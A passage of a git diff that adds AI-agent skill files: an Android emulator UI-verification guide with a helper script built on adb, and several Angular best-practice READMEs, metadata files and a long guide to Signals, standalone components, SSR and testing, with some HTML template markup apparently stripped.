+description: "Expert guidance for building modern Android UIs with Jetpack Compose, covering state management, navigation, performance, and Material Design 3."
risk: safe
source: community
+date_added: "2026-02-27"
---
# Android Jetpack Compose Expert
diff --git a/web-app/public/skills/android_ui_verification/SKILL.md b/web-app/public/skills/android_ui_verification/SKILL.md
new file mode 100644
index 00000000..98511618
--- /dev/null
+++ b/web-app/public/skills/android_ui_verification/SKILL.md
@@ -0,0 +1,66 @@
+---
+name: android_ui_verification
+description: Automated end-to-end UI testing and verification on an Android Emulator using ADB.
+risk: safe
+source: community
+date_added: "2026-02-28"
+---
+
+# Android UI Verification Skill
+
+This skill provides a systematic approach to testing React Native applications on an Android emulator using ADB commands. It allows for autonomous interaction, state verification, and visual regression checking.
+
+## When to Use
+- Verifying UI changes in React Native or Native Android apps.
+- Autonomous debugging of layout issues or interaction bugs.
+- Ensuring feature functionality when manual testing is too slow.
+- Capturing automated screenshots for PR documentation.
+
+## 🛠 Prerequisites
+- Android Emulator running.
+- `adb` installed and in PATH.
+- Application in debug mode for logcat access.
+
+## 🚀 Workflow
+
+### 1. Device Calibration
+Before interacting, always verify the screen resolution to ensure tap coordinates are accurate.
+```bash
+adb shell wm size
+```
+*Note: Layouts are often scaled. Use the physical size returned as the base for coordinate calculations.*
+
+### 2. UI Inspection (State Discovery)
+Use the `uiautomator` dump to find the exact bounds of UI elements (buttons, inputs).
+```bash
+adb shell uiautomator dump /sdcard/view.xml && adb pull /sdcard/view.xml ./artifacts/view.xml
+```
+Search the `view.xml` for `text`, `content-desc`, or `resource-id`. The `bounds` attribute `[x1,y1][x2,y2]` defines the clickable area.
+
+### 3. Interaction Commands
+- **Tap**: `adb shell input tap ` (Use the center of the element bounds).
+- **Swipe**: `adb shell input swipe ` (Used for scrolling).
+- **Text Input**: `adb shell input text ""` (Note: Limited support for special characters).
+- **Key Events**: `adb shell input keyevent ` (e.g., 66 for Enter).
+
+### 4. Verification & Reporting
+#### Visual Verification
+Capture a screenshot after interaction to confirm UI changes.
+```bash
+adb shell screencap -p /sdcard/screen.png && adb pull /sdcard/screen.png ./artifacts/test_result.png
+```
+
+#### Analytical Verification
+Monitor the JS console logs in real-time to detect errors or log successes.
+```bash
+adb logcat -d | grep "ReactNativeJS" | tail -n 20
+```
+
+#### Cleanup
+Always store generated files in the `artifacts/` folder to satisfy project organization rules.
+
+## 💡 Best Practices
+- **Wait for Animations**: Always add a short sleep (e.g., 1-2s) between interaction and verification.
+- **Center Taps**: Calculate the arithmetic mean of `[x1,y1][x2,y2]` for the most reliable tap target.
+- **Log Markers**: Use distinct log messages in the code (e.g., `✅ Action Successful`) to make `grep` verification easy.
+- **Fail Fast**: If a `uiautomator dump` fails or doesn't find the expected text, stop and troubleshoot rather than blind-tapping.
diff --git a/web-app/public/skills/android_ui_verification/scripts/verify_ui.sh b/web-app/public/skills/android_ui_verification/scripts/verify_ui.sh
new file mode 100644
index 00000000..f2551329
--- /dev/null
+++ b/web-app/public/skills/android_ui_verification/scripts/verify_ui.sh
@@ -0,0 +1,32 @@
+#!/bin/bash
+
+# Helper script for Android UI Verification Skill
+# Usage: ./verify_ui.sh [screenshot_name]
+
+ARTIFACTS_DIR="./artifacts"
+SCREENSHOT_NAME="${1:-latest_screen}"
+
+echo "🚀 Starting UI Verification..."
+
+# 1. Create artifacts directory if not exists
+mkdir -p "$ARTIFACTS_DIR"
+
+# 2. Get Resolution
+echo "📏 Calibrating display..."
+adb shell wm size
+
+# 3. Dump UI XML
+echo "📋 Dumping UI hierarchy..."
+adb shell uiautomator dump /sdcard/view.xml
+adb pull /sdcard/view.xml "$ARTIFACTS_DIR/view.xml"
+
+# 4. Capture Screenshot
+echo "📸 Capturing screenshot: $SCREENSHOT_NAME.png"
+adb shell screencap -p /sdcard/screen.png
+adb pull /sdcard/screen.png "$ARTIFACTS_DIR/$SCREENSHOT_NAME.png"
+
+# 5. Get Recent JS Logs
+echo "📜 Fetching recent JS logs..."
+adb logcat -d | grep "ReactNativeJS" | tail -n 20 > "$ARTIFACTS_DIR/js_logs.txt"
+
+echo "✅ Done. Artifacts saved in $ARTIFACTS_DIR"
diff --git a/web-app/public/skills/angular-best-practices/README.md b/web-app/public/skills/angular-best-practices/README.md
new file mode 100644
index 00000000..143a521f
--- /dev/null
+++ b/web-app/public/skills/angular-best-practices/README.md
@@ -0,0 +1,58 @@
+# Angular Best Practices
+
+Performance optimization and best practices for Angular applications optimized for AI agents and LLMs.
+
+## Overview
+
+This skill provides prioritized performance guidelines across:
+
+- **Change Detection** - OnPush strategy, Signals, Zoneless apps
+- **Async Operations** - Avoiding waterfalls, SSR preloading
+- **Bundle Optimization** - Lazy loading, `@defer`, tree-shaking
+- **Rendering Performance** - TrackBy, virtual scrolling, CDK
+- **SSR & Hydration** - Server-side rendering patterns
+- **Template Optimization** - Structural directives, pipe memoization
+- **State Management** - Efficient reactivity patterns
+- **Memory Management** - Subscription cleanup, detached refs
+
+## Structure
+
+The `SKILL.md` file is organized by priority:
+
+1. **Critical Priority** - Largest performance gains (change detection, async)
+2. **High Priority** - Significant impact (bundles, rendering)
+3. **Medium Priority** - Noticeable improvements (SSR, templates)
+4. **Low Priority** - Incremental gains (memory, cleanup)
+
+Each rule includes:
+
+- ❌ **WRONG** - What not to do
+- ✅ **CORRECT** - Recommended pattern
+- 📝 **Why** - Explanation of the impact
+
+## Quick Reference Checklist
+
+**For New Components:**
+
+- [ ] Using `ChangeDetectionStrategy.OnPush`
+- [ ] Using Signals for reactive state
+- [ ] Using `@defer` for non-critical content
+- [ ] Using `trackBy` for `*ngFor` loops
+- [ ] No subscriptions without cleanup
+
+**For Performance Reviews:**
+
+- [ ] No async waterfalls (parallel data fetching)
+- [ ] Routes lazy-loaded
+- [ ] Large libraries code-split
+- [ ] Images use `NgOptimizedImage`
+
+## Version
+
+Current version: 1.0.0 (February 2026)
+
+## References
+
+- [Angular Performance](https://angular.dev/guide/performance)
+- [Zoneless Angular](https://angular.dev/guide/zoneless)
+- [Angular SSR](https://angular.dev/guide/ssr)
diff --git a/web-app/public/skills/angular-best-practices/SKILL.md b/web-app/public/skills/angular-best-practices/SKILL.md
index 599fcfe5..891fdda0 100644
--- a/web-app/public/skills/angular-best-practices/SKILL.md
+++ b/web-app/public/skills/angular-best-practices/SKILL.md
@@ -3,6 +3,7 @@ name: angular-best-practices
description: "Angular performance optimization and best practices guide. Use when writing, reviewing, or refactoring Angular code for optimal performance, bundle size, and rendering efficiency."
risk: safe
source: self
+date_added: "2026-02-27"
---
# Angular Best Practices
diff --git a/web-app/public/skills/angular-best-practices/metadata.json b/web-app/public/skills/angular-best-practices/metadata.json
new file mode 100644
index 00000000..633f57c6
--- /dev/null
+++ b/web-app/public/skills/angular-best-practices/metadata.json
@@ -0,0 +1,13 @@
+{
+ "version": "1.0.0",
+ "organization": "Antigravity Awesome Skills",
+ "date": "February 2026",
+ "abstract": "Performance optimization and best practices guide for Angular applications designed for AI agents and LLMs. Covers change detection strategies (OnPush, Signals, Zoneless), avoiding async waterfalls, bundle optimization with lazy loading and @defer, rendering performance, SSR/hydration patterns, and memory management. Prioritized by impact from critical to incremental improvements.",
+ "references": [
+ "https://angular.dev/best-practices",
+ "https://angular.dev/guide/performance",
+ "https://angular.dev/guide/zoneless",
+ "https://angular.dev/guide/ssr",
+ "https://web.dev/performance"
+ ]
+}
diff --git a/web-app/public/skills/angular-migration/SKILL.md b/web-app/public/skills/angular-migration/SKILL.md
index 19a9d714..760df3dc 100644
--- a/web-app/public/skills/angular-migration/SKILL.md
+++ b/web-app/public/skills/angular-migration/SKILL.md
@@ -3,6 +3,7 @@ name: angular-migration
description: "Migrate from AngularJS to Angular using hybrid mode, incremental component rewriting, and dependency injection updates. Use when upgrading AngularJS applications, planning framework migrations, or ..."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Angular Migration
diff --git a/web-app/public/skills/angular-state-management/README.md b/web-app/public/skills/angular-state-management/README.md
new file mode 100644
index 00000000..e8ffb15e
--- /dev/null
+++ b/web-app/public/skills/angular-state-management/README.md
@@ -0,0 +1,41 @@
+# Angular State Management
+
+Complete state management patterns for Angular applications optimized for AI agents and LLMs.
+
+## Overview
+
+This skill provides decision frameworks and implementation patterns for:
+
+- **Signal-based Services** - Lightweight state for shared data
+- **NgRx SignalStore** - Feature-scoped state with computed values
+- **NgRx Store** - Enterprise-scale global state management
+- **RxJS ComponentStore** - Reactive component-level state
+- **Forms State** - Reactive and template-driven form patterns
+
+## Structure
+
+The `SKILL.md` file is organized into:
+
+1. **State Categories** - Local, shared, global, server, URL, and form state
+2. **Selection Criteria** - Decision trees for choosing the right solution
+3. **Implementation Patterns** - Complete examples for each approach
+4. **Migration Guides** - Moving from BehaviorSubject to Signals
+5. **Bridging Patterns** - Integrating Signals with RxJS
+
+## When to Use Each Pattern
+
+- **Signal Service**: Shared UI state (theme, user preferences)
+- **NgRx SignalStore**: Feature state with computed values
+- **NgRx Store**: Complex cross-feature dependencies
+- **ComponentStore**: Component-scoped async operations
+- **Reactive Forms**: Form state with validation
+
+## Version
+
+Current version: 1.0.0 (February 2026)
+
+## References
+
+- [Angular Signals](https://angular.dev/guide/signals)
+- [NgRx](https://ngrx.io)
+- [NgRx SignalStore](https://ngrx.io/guide/signals)
diff --git a/web-app/public/skills/angular-state-management/SKILL.md b/web-app/public/skills/angular-state-management/SKILL.md
index c1cb2a21..88624cd2 100644
--- a/web-app/public/skills/angular-state-management/SKILL.md
+++ b/web-app/public/skills/angular-state-management/SKILL.md
@@ -3,6 +3,7 @@ name: angular-state-management
description: "Master modern Angular state management with Signals, NgRx, and RxJS. Use when setting up global state, managing component stores, choosing between state solutions, or migrating from legacy patterns."
risk: safe
source: self
+date_added: "2026-02-27"
---
# Angular State Management
diff --git a/web-app/public/skills/angular-state-management/metadata.json b/web-app/public/skills/angular-state-management/metadata.json
new file mode 100644
index 00000000..97132e00
--- /dev/null
+++ b/web-app/public/skills/angular-state-management/metadata.json
@@ -0,0 +1,13 @@
+{
+ "version": "1.0.0",
+ "organization": "Antigravity Awesome Skills",
+ "date": "February 2026",
+ "abstract": "Complete state management guide for Angular applications designed for AI agents and LLMs. Covers Signal-based services, NgRx for global state, RxJS patterns, and component stores. Includes decision trees for choosing the right solution, migration patterns from BehaviorSubject to Signals, and strategies for bridging Signals with RxJS observables.",
+ "references": [
+ "https://angular.dev/guide/signals",
+ "https://ngrx.io",
+ "https://ngrx.io/guide/signals",
+ "https://www.rx-angular.io",
+ "https://github.com/ngrx/platform"
+ ]
+}
diff --git a/web-app/public/skills/angular-ui-patterns/README.md b/web-app/public/skills/angular-ui-patterns/README.md
new file mode 100644
index 00000000..521301c0
--- /dev/null
+++ b/web-app/public/skills/angular-ui-patterns/README.md
@@ -0,0 +1,55 @@
+# Angular UI Patterns
+
+Modern UI patterns for building robust Angular applications optimized for AI agents and LLMs.
+
+## Overview
+
+This skill covers essential UI patterns for:
+
+- **Loading States** - Skeleton vs spinner decision trees
+- **Error Handling** - Error boundary hierarchy and recovery
+- **Progressive Disclosure** - Using `@defer` for lazy rendering
+- **Data Display** - Handling empty, loading, and error states
+- **Form Patterns** - Submission states and validation feedback
+- **Dialog/Modal Patterns** - Proper dialog lifecycle management
+
+## Core Principles
+
+1. **Never show stale UI** - Only show loading when no data exists
+2. **Surface all errors** - Never silently fail
+3. **Optimistic updates** - Update UI before server confirms
+4. **Progressive disclosure** - Use `@defer` to load non-critical content
+5. **Graceful degradation** - Fallback for failed features
+
+## Structure
+
+The `SKILL.md` file includes:
+
+1. **Golden Rules** - Non-negotiable patterns to follow
+2. **Decision Trees** - When to use skeleton vs spinner
+3. **Code Examples** - Correct vs incorrect implementations
+4. **Anti-patterns** - Common mistakes to avoid
+
+## Quick Reference
+
+```html
+
+@if (error()) {
+
+} @else if (loading() && !data()) {
+
+} @else if (!data()?.length) {
+
+} @else {
+
+}
+```
+
+## Version
+
+Current version: 1.0.0 (February 2026)
+
+## References
+
+- [Angular @defer](https://angular.dev/guide/defer)
+- [Angular Templates](https://angular.dev/guide/templates)
diff --git a/web-app/public/skills/angular-ui-patterns/SKILL.md b/web-app/public/skills/angular-ui-patterns/SKILL.md
index 9f243afb..e51ce052 100644
--- a/web-app/public/skills/angular-ui-patterns/SKILL.md
+++ b/web-app/public/skills/angular-ui-patterns/SKILL.md
@@ -3,6 +3,7 @@ name: angular-ui-patterns
description: "Modern Angular UI patterns for loading states, error handling, and data display. Use when building UI components, handling async data, or managing component states."
risk: safe
source: self
+date_added: "2026-02-27"
---
# Angular UI Patterns
diff --git a/web-app/public/skills/angular-ui-patterns/metadata.json b/web-app/public/skills/angular-ui-patterns/metadata.json
new file mode 100644
index 00000000..38a0f5c9
--- /dev/null
+++ b/web-app/public/skills/angular-ui-patterns/metadata.json
@@ -0,0 +1,12 @@
+{
+ "version": "1.0.0",
+ "organization": "Antigravity Awesome Skills",
+ "date": "February 2026",
+ "abstract": "Modern UI patterns for Angular applications designed for AI agents and LLMs. Covers loading states, error handling, progressive disclosure, and data display patterns. Emphasizes showing loading only without data, surfacing all errors, optimistic updates, and graceful degradation using @defer. Includes decision trees and anti-patterns to avoid.",
+ "references": [
+ "https://angular.dev/guide/defer",
+ "https://angular.dev/guide/templates",
+ "https://material.angular.io",
+ "https://ng-spartan.com"
+ ]
+}
diff --git a/web-app/public/skills/angular/README.md b/web-app/public/skills/angular/README.md
new file mode 100644
index 00000000..1929725e
--- /dev/null
+++ b/web-app/public/skills/angular/README.md
@@ -0,0 +1,40 @@
+# Angular
+
+A comprehensive guide to modern Angular development (v20+) optimized for AI agents and LLMs.
+
+## Overview
+
+This skill covers modern Angular patterns including:
+
+- **Signals** - Angular's reactive primitive for state management
+- **Standalone Components** - Modern component architecture without NgModules
+- **Zoneless Applications** - High-performance apps without Zone.js
+- **SSR & Hydration** - Server-side rendering and client hydration patterns
+- **Modern Routing** - Functional guards, resolvers, and lazy loading
+- **Dependency Injection** - Modern DI with `inject()` function
+- **Reactive Forms** - Type-safe form handling
+
+## Structure
+
+This skill is a single, comprehensive `SKILL.md` file containing:
+
+1. Modern component patterns with Signal inputs/outputs
+2. State management with Signals and computed values
+3. Performance optimization techniques
+4. SSR and hydration best practices
+5. Migration strategies from legacy Angular patterns
+
+## Usage
+
+This skill is designed to be read in full to understand the complete modern Angular development approach, or referenced for specific patterns when needed.
+
+## Version
+
+Current version: 1.0.0 (February 2026)
+
+## References
+
+- [Angular Documentation](https://angular.dev)
+- [Angular Signals](https://angular.dev/guide/signals)
+- [Zoneless Angular](https://angular.dev/guide/zoneless)
+- [Angular SSR](https://angular.dev/guide/ssr)
diff --git a/web-app/public/skills/angular/SKILL.md b/web-app/public/skills/angular/SKILL.md
new file mode 100644
index 00000000..761f8e5f
--- /dev/null
+++ b/web-app/public/skills/angular/SKILL.md
@@ -0,0 +1,818 @@
+---
+name: angular
+description: Modern Angular (v20+) expert with deep knowledge of Signals, Standalone Components, Zoneless applications, SSR/Hydration, and reactive patterns.
+risk: safe
+source: self
+date_added: '2026-02-27'
+---
+
+# Angular Expert
+
+Master modern Angular development with Signals, Standalone Components, Zoneless applications, SSR/Hydration, and the latest reactive patterns.
+
+## When to Use This Skill
+
+- Building new Angular applications (v20+)
+- Implementing Signals-based reactive patterns
+- Creating Standalone Components and migrating from NgModules
+- Configuring Zoneless Angular applications
+- Implementing SSR, prerendering, and hydration
+- Optimizing Angular performance
+- Adopting modern Angular patterns and best practices
+
+## Do Not Use This Skill When
+
+- Migrating from AngularJS (1.x) → use `angular-migration` skill
+- Working with legacy Angular apps that cannot upgrade
+- General TypeScript issues → use `typescript-expert` skill
+
+## Instructions
+
+1. Assess the Angular version and project structure
+2. Apply modern patterns (Signals, Standalone, Zoneless)
+3. Implement with proper typing and reactivity
+4. Validate with build and tests
+
+## Safety
+
+- Always test changes in development before production
+- Gradual migration for existing apps (don't big-bang refactor)
+- Keep backward compatibility during transitions
+
+---
+
+## Angular Version Timeline
+
+| Version | Release | Key Features |
+| -------------- | ------- | ------------------------------------------------------ |
+| **Angular 20** | Q2 2025 | Signals stable, Zoneless stable, Incremental hydration |
+| **Angular 21** | Q4 2025 | Signals-first default, Enhanced SSR |
+| **Angular 22** | Q2 2026 | Signal Forms, Selectorless components |
+
+---
+
+## 1. Signals: The New Reactive Primitive
+
+Signals are Angular's fine-grained reactivity system, replacing zone.js-based change detection.
+
+### Core Concepts
+
+```typescript
+import { signal, computed, effect } from "@angular/core";
+
+// Writable signal
+const count = signal(0);
+
+// Read value
+console.log(count()); // 0
+
+// Update value
+count.set(5); // Direct set
+count.update((v) => v + 1); // Functional update
+
+// Computed (derived) signal
+const doubled = computed(() => count() * 2);
+
+// Effect (side effects)
+effect(() => {
+ console.log(`Count changed to: ${count()}`);
+});
+```
+
+### Signal-Based Inputs and Outputs
+
+```typescript
+import { Component, input, output, model } from "@angular/core";
+
+@Component({
+ selector: "app-user-card",
+ standalone: true,
+ template: `
+
+
{{ name() }}
+ {{ role() }}
+ Select
+
+ `,
+})
+export class UserCardComponent {
+ // Signal inputs (read-only)
+ id = input.required();
+ name = input.required();
+ role = input("User"); // With default
+
+ // Output
+ select = output();
+
+ // Two-way binding (model)
+ isSelected = model(false);
+}
+
+// Usage:
+//
+```
+
+### Signal Queries (ViewChild/ContentChild)
+
+```typescript
+import {
+ Component,
+ viewChild,
+ viewChildren,
+ contentChild,
+} from "@angular/core";
+
+@Component({
+ selector: "app-container",
+ standalone: true,
+ template: `
+
+
+ `,
+})
+export class ContainerComponent {
+ // Signal-based queries
+ searchInput = viewChild("searchInput");
+ items = viewChildren(ItemComponent);
+ projectedContent = contentChild(HeaderDirective);
+
+ focusSearch() {
+ this.searchInput()?.nativeElement.focus();
+ }
+}
+```
+
+### When to Use Signals vs RxJS
+
+| Use Case | Signals | RxJS |
+| ----------------------- | --------------- | -------------------------------- |
+| Local component state | ✅ Preferred | Overkill |
+| Derived/computed values | ✅ `computed()` | `combineLatest` works |
+| Side effects | ✅ `effect()` | `tap` operator |
+| HTTP requests | ❌ | ✅ HttpClient returns Observable |
+| Event streams | ❌ | ✅ `fromEvent`, operators |
+| Complex async flows | ❌ | ✅ `switchMap`, `mergeMap` |
+
+---
+
+## 2. Standalone Components
+
+Standalone components are self-contained and don't require NgModule declarations.
+
+### Creating Standalone Components
+
+```typescript
+import { Component } from "@angular/core";
+import { CommonModule } from "@angular/common";
+import { RouterLink } from "@angular/router";
+
+@Component({
+ selector: "app-header",
+ standalone: true,
+ imports: [CommonModule, RouterLink], // Direct imports
+ template: `
+
+ `,
+})
+export class HeaderComponent {}
+```
+
+### Bootstrapping Without NgModule
+
+```typescript
+// main.ts
+import { bootstrapApplication } from "@angular/platform-browser";
+import { provideRouter } from "@angular/router";
+import { provideHttpClient } from "@angular/common/http";
+import { AppComponent } from "./app/app.component";
+import { routes } from "./app/app.routes";
+
+bootstrapApplication(AppComponent, {
+ providers: [provideRouter(routes), provideHttpClient()],
+});
+```
+
+### Lazy Loading Standalone Components
+
+```typescript
+// app.routes.ts
+import { Routes } from "@angular/router";
+
+export const routes: Routes = [
+ {
+ path: "dashboard",
+ loadComponent: () =>
+ import("./dashboard/dashboard.component").then(
+ (m) => m.DashboardComponent,
+ ),
+ },
+ {
+ path: "admin",
+ loadChildren: () =>
+ import("./admin/admin.routes").then((m) => m.ADMIN_ROUTES),
+ },
+];
+```
+
+---
+
+## 3. Zoneless Angular
+
+Zoneless applications don't use zone.js, improving performance and debugging.
+
+### Enabling Zoneless Mode
+
+```typescript
+// main.ts
+import { bootstrapApplication } from "@angular/platform-browser";
+import { provideZonelessChangeDetection } from "@angular/core";
+import { AppComponent } from "./app/app.component";
+
+bootstrapApplication(AppComponent, {
+ providers: [provideZonelessChangeDetection()],
+});
+```
+
+### Zoneless Component Patterns
+
+```typescript
+import { Component, signal, ChangeDetectionStrategy } from "@angular/core";
+
+@Component({
+ selector: "app-counter",
+ standalone: true,
+ changeDetection: ChangeDetectionStrategy.OnPush,
+ template: `
+ Count: {{ count() }}
+ +
+ `,
+})
+export class CounterComponent {
+ count = signal(0);
+
+ increment() {
+ this.count.update((v) => v + 1);
+ // No zone.js needed - Signal triggers change detection
+ }
+}
+```
+
+### Key Zoneless Benefits
+
+- **Performance**: No zone.js patches on async APIs
+- **Debugging**: Clean stack traces without zone wrappers
+- **Bundle size**: Smaller without zone.js (~15KB savings)
+- **Interoperability**: Better with Web Components and micro-frontends
+
+---
+
+## 4. Server-Side Rendering & Hydration
+
+### SSR Setup with Angular CLI
+
+```bash
+ng add @angular/ssr
+```
+
+### Hydration Configuration
+
+```typescript
+// app.config.ts
+import { ApplicationConfig } from "@angular/core";
+import {
+ provideClientHydration,
+ withEventReplay,
+} from "@angular/platform-browser";
+
+export const appConfig: ApplicationConfig = {
+ providers: [provideClientHydration(withEventReplay())],
+};
+```
+
+### Incremental Hydration (v20+)
+
+```typescript
+import { Component } from "@angular/core";
+
+@Component({
+ selector: "app-page",
+ standalone: true,
+ template: `
+
+
+ @defer (hydrate on viewport) {
+
+ }
+
+ @defer (hydrate on interaction) {
+
+ }
+ `,
+})
+export class PageComponent {}
+```
+
+### Hydration Triggers
+
+| Trigger | When to Use |
+| ---------------- | --------------------------------------- |
+| `on idle` | Low-priority, hydrate when browser idle |
+| `on viewport` | Hydrate when element enters viewport |
+| `on interaction` | Hydrate on first user interaction |
+| `on hover` | Hydrate when user hovers |
+| `on timer(ms)` | Hydrate after specified delay |
+
+---
+
+## 5. Modern Routing Patterns
+
+### Functional Route Guards
+
+```typescript
+// auth.guard.ts
+import { inject } from "@angular/core";
+import { Router, CanActivateFn } from "@angular/router";
+import { AuthService } from "./auth.service";
+
+export const authGuard: CanActivateFn = (route, state) => {
+ const auth = inject(AuthService);
+ const router = inject(Router);
+
+ if (auth.isAuthenticated()) {
+ return true;
+ }
+
+ return router.createUrlTree(["/login"], {
+ queryParams: { returnUrl: state.url },
+ });
+};
+
+// Usage in routes
+export const routes: Routes = [
+ {
+ path: "dashboard",
+ loadComponent: () => import("./dashboard.component"),
+ canActivate: [authGuard],
+ },
+];
+```
+
+### Route-Level Data Resolvers
+
+```typescript
+import { inject } from '@angular/core';
+import { ResolveFn } from '@angular/router';
+import { UserService } from './user.service';
+import { User } from './user.model';
+
+export const userResolver: ResolveFn = (route) => {
+ const userService = inject(UserService);
+ return userService.getUser(route.paramMap.get('id')!);
+};
+
+// In routes
+{
+ path: 'user/:id',
+ loadComponent: () => import('./user.component'),
+ resolve: { user: userResolver }
+}
+
+// In component
+export class UserComponent {
+ private route = inject(ActivatedRoute);
+ user = toSignal(this.route.data.pipe(map(d => d['user'])));
+}
+```
+
+---
+
+## 6. Dependency Injection Patterns
+
+### Modern inject() Function
+
+```typescript
+import { Component, inject } from '@angular/core';
+import { HttpClient } from '@angular/common/http';
+import { UserService } from './user.service';
+
+@Component({...})
+export class UserComponent {
+ // Modern inject() - no constructor needed
+ private http = inject(HttpClient);
+ private userService = inject(UserService);
+
+ // Works in any injection context
+ users = toSignal(this.userService.getUsers());
+}
+```
+
+### Injection Tokens for Configuration
+
+```typescript
+import { InjectionToken, inject } from "@angular/core";
+
+// Define token
+export const API_BASE_URL = new InjectionToken("API_BASE_URL");
+
+// Provide in config
+bootstrapApplication(AppComponent, {
+ providers: [{ provide: API_BASE_URL, useValue: "https://api.example.com" }],
+});
+
+// Inject in service
+@Injectable({ providedIn: "root" })
+export class ApiService {
+ private baseUrl = inject(API_BASE_URL);
+
+ get(endpoint: string) {
+ return this.http.get(`${this.baseUrl}/${endpoint}`);
+ }
+}
+```
+
+---
+
+## 7. Component Composition & Reusability
+
+### Content Projection (Slots)
+
+```typescript
+@Component({
+ selector: 'app-card',
+ template: `
+
+ `
+})
+export class CardComponent {}
+
+// Usage
+
+ Title
+ Body content
+
+```
+
+### Host Directives (Composition)
+
+```typescript
+// Reusable behaviors without inheritance
+@Directive({
+ standalone: true,
+ selector: '[appTooltip]',
+ inputs: ['tooltip'] // Signal input alias
+})
+export class TooltipDirective { ... }
+
+@Component({
+ selector: 'app-button',
+ standalone: true,
+ hostDirectives: [
+ {
+ directive: TooltipDirective,
+ inputs: ['tooltip: title'] // Map input
+ }
+ ],
+ template: ` `
+})
+export class ButtonComponent {}
+```
+
+---
+
+## 8. State Management Patterns
+
+### Signal-Based State Service
+
+```typescript
+import { Injectable, signal, computed } from "@angular/core";
+
+interface AppState {
+ user: User | null;
+ theme: "light" | "dark";
+ notifications: Notification[];
+}
+
+@Injectable({ providedIn: "root" })
+export class StateService {
+ // Private writable signals
+ private _user = signal(null);
+ private _theme = signal<"light" | "dark">("light");
+ private _notifications = signal([]);
+
+ // Public read-only computed
+ readonly user = computed(() => this._user());
+ readonly theme = computed(() => this._theme());
+ readonly notifications = computed(() => this._notifications());
+ readonly unreadCount = computed(
+ () => this._notifications().filter((n) => !n.read).length,
+ );
+
+ // Actions
+ setUser(user: User | null) {
+ this._user.set(user);
+ }
+
+ toggleTheme() {
+ this._theme.update((t) => (t === "light" ? "dark" : "light"));
+ }
+
+ addNotification(notification: Notification) {
+ this._notifications.update((n) => [...n, notification]);
+ }
+}
+```
+
+### Component Store Pattern with Signals
+
+```typescript
+import { Injectable, signal, computed, inject } from "@angular/core";
+import { HttpClient } from "@angular/common/http";
+import { toSignal } from "@angular/core/rxjs-interop";
+
+@Injectable()
+export class ProductStore {
+ private http = inject(HttpClient);
+
+ // State
+ private _products = signal([]);
+ private _loading = signal(false);
+ private _filter = signal("");
+
+ // Selectors
+ readonly products = computed(() => this._products());
+ readonly loading = computed(() => this._loading());
+ readonly filteredProducts = computed(() => {
+ const filter = this._filter().toLowerCase();
+ return this._products().filter((p) =>
+ p.name.toLowerCase().includes(filter),
+ );
+ });
+
+ // Actions
+ loadProducts() {
+ this._loading.set(true);
+ this.http.get("/api/products").subscribe({
+ next: (products) => {
+ this._products.set(products);
+ this._loading.set(false);
+ },
+ error: () => this._loading.set(false),
+ });
+ }
+
+ setFilter(filter: string) {
+ this._filter.set(filter);
+ }
+}
+```
+
+---
+
+## 9. Forms with Signals (Coming in v22+)
+
+### Current Reactive Forms
+
+```typescript
+import { Component, inject } from "@angular/core";
+import { FormBuilder, Validators, ReactiveFormsModule } from "@angular/forms";
+
+@Component({
+ selector: "app-user-form",
+ standalone: true,
+ imports: [ReactiveFormsModule],
+ template: `
+
+ `,
+})
+export class UserFormComponent {
+ private fb = inject(FormBuilder);
+
+ form = this.fb.group({
+ name: ["", Validators.required],
+ email: ["", [Validators.required, Validators.email]],
+ });
+
+ onSubmit() {
+ if (this.form.valid) {
+ console.log(this.form.value);
+ }
+ }
+}
+```
+
+### Signal-Aware Form Patterns (Preview)
+
+```typescript
+// Future Signal Forms API (experimental)
+import { Component, signal } from '@angular/core';
+
+@Component({...})
+export class SignalFormComponent {
+ name = signal('');
+ email = signal('');
+
+ // Computed validation
+ isValid = computed(() =>
+ this.name().length > 0 &&
+ this.email().includes('@')
+ );
+
+ submit() {
+ if (this.isValid()) {
+ console.log({ name: this.name(), email: this.email() });
+ }
+ }
+}
+```
+
+---
+
+## 10. Performance Optimization
+
+### Change Detection Strategies
+
+```typescript
+@Component({
+ changeDetection: ChangeDetectionStrategy.OnPush,
+ // Only checks when:
+ // 1. Input signal/reference changes
+ // 2. Event handler runs
+ // 3. Async pipe emits
+ // 4. Signal value changes
+})
+```
+
+### Defer Blocks for Lazy Loading
+
+```typescript
+@Component({
+ template: `
+
+
+
+
+ @defer (on viewport) {
+
+ } @placeholder {
+
+ } @loading (minimum 200ms) {
+
+ } @error {
+ Failed to load chart
+ }
+ `
+})
+```
+
+### NgOptimizedImage
+
+```typescript
+import { NgOptimizedImage } from '@angular/common';
+
+@Component({
+ imports: [NgOptimizedImage],
+ template: `
+
+
+
+ `
+})
+```
+
+---
+
+## 11. Testing Modern Angular
+
+### Testing Signal Components
+
+```typescript
+import { ComponentFixture, TestBed } from "@angular/core/testing";
+import { CounterComponent } from "./counter.component";
+
+describe("CounterComponent", () => {
+ let component: CounterComponent;
+ let fixture: ComponentFixture;
+
+ beforeEach(async () => {
+ await TestBed.configureTestingModule({
+ imports: [CounterComponent], // Standalone import
+ }).compileComponents();
+
+ fixture = TestBed.createComponent(CounterComponent);
+ component = fixture.componentInstance;
+ fixture.detectChanges();
+ });
+
+ it("should increment count", () => {
+ expect(component.count()).toBe(0);
+
+ component.increment();
+
+ expect(component.count()).toBe(1);
+ });
+
+ it("should update DOM on signal change", () => {
+ component.count.set(5);
+ fixture.detectChanges();
+
+ const el = fixture.nativeElement.querySelector(".count");
+ expect(el.textContent).toContain("5");
+ });
+});
+```
+
+### Testing with Signal Inputs
+
+```typescript
+import { ComponentFixture, TestBed } from "@angular/core/testing";
+import { ComponentRef } from "@angular/core";
+import { UserCardComponent } from "./user-card.component";
+
+describe("UserCardComponent", () => {
+ let fixture: ComponentFixture;
+ let componentRef: ComponentRef;
+
+ beforeEach(async () => {
+ await TestBed.configureTestingModule({
+ imports: [UserCardComponent],
+ }).compileComponents();
+
+ fixture = TestBed.createComponent(UserCardComponent);
+ componentRef = fixture.componentRef;
+
+ // Set signal inputs via setInput
+ componentRef.setInput("id", "123");
+ componentRef.setInput("name", "John Doe");
+
+ fixture.detectChanges();
+ });
+
+ it("should display user name", () => {
+ const el = fixture.nativeElement.querySelector("h3");
+ expect(el.textContent).toContain("John Doe");
+ });
+});
+```
+
+---
+
+## Best Practices Summary
+
+| Pattern | ✅ Do | ❌ Don't |
+| -------------------- | ------------------------------ | ------------------------------- |
+| **State** | Use Signals for local state | Overuse RxJS for simple state |
+| **Components** | Standalone with direct imports | Bloated SharedModules |
+| **Change Detection** | OnPush + Signals | Default CD everywhere |
